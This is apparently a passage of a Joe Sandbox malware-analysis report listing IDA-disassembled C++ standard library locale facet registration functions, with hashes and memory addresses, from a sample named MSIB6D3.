                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                    • String ID:
                                                                                    • API String ID: 743221004-0
                                                                                    • Opcode ID: d78e8bd0b971d33cffd7dc05ac37cfabd06c4ba056c67a69862ef20efe429bc1
                                                                                    • Instruction ID: 6880c0916478a469614c4b820fe7d649d5586e8b3618c78891a8bfc3ce60573c
                                                                                    • Opcode Fuzzy Hash: d78e8bd0b971d33cffd7dc05ac37cfabd06c4ba056c67a69862ef20efe429bc1
                                                                                    • Instruction Fuzzy Hash: 2711AC35900616DBCB05BB64A8416AEB7E0EF84710F3404D9E811AB2E1CF70AE048B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42301
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4230B
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • codecvt.LIBCPMT ref: 00B42345
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4235C
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4237C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                    • String ID:
                                                                                    • API String ID: 712880209-0
                                                                                    • Opcode ID: 76f12f3a134b99d8be5d3809b904780bbcbfb45d4df7ae6c5bf5bafb1e339b63
                                                                                    • Instruction ID: 7db818db9e16e82bdfb8245ea8684c1e7a43509542ef673587b365f14d9045fa
                                                                                    • Opcode Fuzzy Hash: 76f12f3a134b99d8be5d3809b904780bbcbfb45d4df7ae6c5bf5bafb1e339b63
                                                                                    • Instruction Fuzzy Hash: 0901AD35900615DFCB15AB649841AAEB7F0AF80B20F650589F514AB2D1CF749F04EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42396
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B423A0
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • codecvt.LIBCPMT ref: 00B423DA
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B423F1
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42411
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                    • String ID:
                                                                                    • API String ID: 712880209-0
                                                                                    • Opcode ID: 732eea21bcefccfb189cac5ba8f784ca25422c5496bfe8a53b1fda81a72d4b58
                                                                                    • Instruction ID: 4759a5e63a4434868b4843380f27b78a6cb5c8a38051ed4ca0db2f0256802558
                                                                                    • Opcode Fuzzy Hash: 732eea21bcefccfb189cac5ba8f784ca25422c5496bfe8a53b1fda81a72d4b58
                                                                                    • Instruction Fuzzy Hash: D801AD359001199BCB15AB6498456BEB7F1EF80B10F640489F5146B392CF749F45EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B424C0
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B424CA
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • collate.LIBCPMT ref: 00B42504
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4251B
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4253B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                    • String ID:
                                                                                    • API String ID: 1007100420-0
                                                                                    • Opcode ID: 34defc18d25928122bc3e1558db840f22d8209740b2e8faef217428c43b035a8
                                                                                    • Instruction ID: 0c8d46aaa9862f865a48f9a062c89599f410f1b4e299a586bd486734dd97c4c2
                                                                                    • Opcode Fuzzy Hash: 34defc18d25928122bc3e1558db840f22d8209740b2e8faef217428c43b035a8
                                                                                    • Instruction Fuzzy Hash: AA01C031900615DBCB05FB64D8456AEB7E0EF94720F6504C9F514AB2D1CF709F04EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4242B
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42435
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • collate.LIBCPMT ref: 00B4246F
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42486
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B424A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                    • String ID:
                                                                                    • API String ID: 1007100420-0
                                                                                    • Opcode ID: b568f33f51ff8f5218c99307c8c2075d9ca180ed7dc0a219abcc84d65ea2f933
                                                                                    • Instruction ID: d92e0fd71fcc9da3cdb1b45701c0f245a2f8a0add6262bf58996619ae198d528
                                                                                    • Opcode Fuzzy Hash: b568f33f51ff8f5218c99307c8c2075d9ca180ed7dc0a219abcc84d65ea2f933
                                                                                    • Instruction Fuzzy Hash: B101C031900215DBCB05EB64D8416AEBBE0EF84720F650489F5146B3D2DF749F04EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B425EA
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B425F4
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • messages.LIBCPMT ref: 00B4262E
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42645
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42665
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                    • String ID:
                                                                                    • API String ID: 2750803064-0
                                                                                    • Opcode ID: 1ad9d47bb892dc3306c5b3fcd76148881c7b007410d481afb93ed2419c665dd0
                                                                                    • Instruction ID: aa075c0899b0aa6b1a1b6527e5afb7c5032acea7c1ab5eaf70bb1d1360d071d1
                                                                                    • Opcode Fuzzy Hash: 1ad9d47bb892dc3306c5b3fcd76148881c7b007410d481afb93ed2419c665dd0
                                                                                    • Instruction Fuzzy Hash: E101C031900219DBCB05FB64D851AAEB7E0EF80710F6544CAF4146B2E2CF709F00EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42555
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4255F
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • ctype.LIBCPMT ref: 00B42599
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B425B0
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B425D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                    • String ID:
                                                                                    • API String ID: 83828444-0
                                                                                    • Opcode ID: 78ad3cbb4c1a8c384804fab95ccbaa520e9698166c9369b1ff88739d25b17d05
                                                                                    • Instruction ID: 8af688a8572758f68126acdddf2380bb45089d49258ecadd66739cbbce6958ae
                                                                                    • Opcode Fuzzy Hash: 78ad3cbb4c1a8c384804fab95ccbaa520e9698166c9369b1ff88739d25b17d05
                                                                                    • Instruction Fuzzy Hash: 1801AD329002199BCB05AB649855AAE77F0EF94720F654489F414AB2D2DF709F44EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B3D6C4
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3D6CE
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • codecvt.LIBCPMT ref: 00B3D708
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B3D71F
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3D73F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                    • String ID:
                                                                                    • API String ID: 712880209-0
                                                                                    • Opcode ID: ba43d4cbc87ffe8505ae6e29823d6f3f463aea60fae62a4baf44b8da9e1c9075
                                                                                    • Instruction ID: cd69a3f833cd3792f11b1d21e6f9c1d9a28c42d2575af4be10dd313210df4373
                                                                                    • Opcode Fuzzy Hash: ba43d4cbc87ffe8505ae6e29823d6f3f463aea60fae62a4baf44b8da9e1c9075
                                                                                    • Instruction Fuzzy Hash: 61018C36A00619DBCB15FB64A841AAEB7E1FF84710F350989F914AB2D2CF709E05CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4267F
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42689
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • messages.LIBCPMT ref: 00B426C3
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B426DA
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B426FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                    • String ID:
                                                                                    • API String ID: 2750803064-0
                                                                                    • Opcode ID: 29978df6144b56e62c88729023748ee3411c8e128d738a88ee9a6f4b70669cc1
                                                                                    • Instruction ID: d14703be841a23114aef4825e0b5912b136169a2a42caf8656e4fb63ad1655d9
                                                                                    • Opcode Fuzzy Hash: 29978df6144b56e62c88729023748ee3411c8e128d738a88ee9a6f4b70669cc1
                                                                                    • Instruction Fuzzy Hash: 0901AD359006159BCB05BB648841AAEB7E0EF84710F2544CAF5146B292CF709F05EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4E8DF
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4E8E9
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • messages.LIBCPMT ref: 00B4E923
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4E93A
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4E95A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                    • String ID:
                                                                                    • API String ID: 2750803064-0
                                                                                    • Opcode ID: dfbc03fd55fe9c567481565d2ecc5ad58f2ddc81b4e45219a9372ff55d47bef1
                                                                                    • Instruction ID: 83352dde7df21ee10e9056a82ec953d3783fc2587dcfa3a8b3d9bcb36b501182
                                                                                    • Opcode Fuzzy Hash: dfbc03fd55fe9c567481565d2ecc5ad58f2ddc81b4e45219a9372ff55d47bef1
                                                                                    • Instruction Fuzzy Hash: B60169329006299BCB15AB649845ABEB7E1BF84710F2505CAF524AB2D2CF749F04DB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4E84A
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4E854
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • collate.LIBCPMT ref: 00B4E88E
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4E8A5
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4E8C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                    • String ID:
                                                                                    • API String ID: 1007100420-0
                                                                                    • Opcode ID: 6773f44abebc6496ef814d7dad1dc3a84cf6b9e6f0e4f4fe4ffac3b1a15a8d7d
                                                                                    • Instruction ID: 67c4b87281caf571cd3df1027670d86fda8457e7ba356b23011e8d201e5c9019
                                                                                    • Opcode Fuzzy Hash: 6773f44abebc6496ef814d7dad1dc3a84cf6b9e6f0e4f4fe4ffac3b1a15a8d7d
                                                                                    • Instruction Fuzzy Hash: 07016D369005199FCB15FB649841AAEB7E1FF84710F244499F924AB2D2CF709F04DB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B429FD
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42A07
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • moneypunct.LIBCPMT ref: 00B42A41
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42A58
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42A78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                    • String ID:
                                                                                    • API String ID: 419941038-0
                                                                                    • Opcode ID: b4f93e8e8a3f0a16d467cba37d3255008922a948e0102929b4c171c4701393d3
                                                                                    • Instruction ID: fdc4c1ceac74df9f7acf003e07a5869e486cde01a4a371899fb10755ad6479e7
                                                                                    • Opcode Fuzzy Hash: b4f93e8e8a3f0a16d467cba37d3255008922a948e0102929b4c171c4701393d3
                                                                                    • Instruction Fuzzy Hash: DF01C031900215DBCB15EB64C8416BE77E1EF84720F650489F9146B2D2CF709F01E791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42968
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42972
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • moneypunct.LIBCPMT ref: 00B429AC
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B429C3
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B429E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                    • String ID:
                                                                                    • API String ID: 419941038-0
                                                                                    • Opcode ID: 370e2b79b88eabc0b3fb205066d931b86c1b606381ad2603b5220d937c8647c3
                                                                                    • Instruction ID: 11c0d9b00373bcf1d86c59c0731ab34aca39f471f4e7bb071abc4362c4f4299f
                                                                                    • Opcode Fuzzy Hash: 370e2b79b88eabc0b3fb205066d931b86c1b606381ad2603b5220d937c8647c3
                                                                                    • Instruction Fuzzy Hash: AF01D231900615EBCB05FB64C842AAEB7E0EF84710F6505D9F9146B2D2CF709F00EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4EA9E
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4EAA8
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • moneypunct.LIBCPMT ref: 00B4EAE2
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4EAF9
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4EB19
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                    • String ID:
                                                                                    • API String ID: 419941038-0
                                                                                    • Opcode ID: ef899d912d9ff26cc5a1d98fca265e1db3e053bd4acaaff42427f240f1435cf9
                                                                                    • Instruction ID: 3a0dc37b8a4b702dbc2822765b60e7d9e0b3ba5541ccacab479fc0dda9e00078
                                                                                    • Opcode Fuzzy Hash: ef899d912d9ff26cc5a1d98fca265e1db3e053bd4acaaff42427f240f1435cf9
                                                                                    • Instruction Fuzzy Hash: F901AD32900619DBCB15AB649881AAEB7E1FF80720F2408C9F4256B2D2DF709F05D791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42A92
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42A9C
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • moneypunct.LIBCPMT ref: 00B42AD6
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42AED
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42B0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
